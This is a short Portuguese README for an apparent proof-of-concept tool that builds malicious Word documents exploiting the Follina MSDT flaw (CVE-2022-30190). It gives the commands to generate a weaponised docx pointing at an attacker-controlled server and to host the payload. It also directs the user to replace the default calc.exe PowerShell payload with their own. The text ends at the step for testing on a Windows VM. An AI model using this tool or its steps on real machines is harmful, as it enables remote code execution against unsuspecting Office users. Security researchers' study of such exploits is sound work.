
Gerador de documentos PoC para MS-MSDT Follina CVE-2022-30190
Gerador de docx malicioso para explorar (Execução Remota de Código no Microsoft Office Word)
A criação deste script é baseada no PoC do CVE-2021-40444 por LockedByte e no writeup por Tothi
Primeiro modifique o backup.html e substitua o payload do powershell. No momento, apenas executa um calc.exe usando IEX('calc.exe').
python3 exploit.py generate http://<SRV IP>

Depois de gerar o docx malicioso (ficará em out/), você pode configurar o servidor:
sudo python3 exploit.py host 80

Por fim, teste o docx em uma máquina virtual Windows:
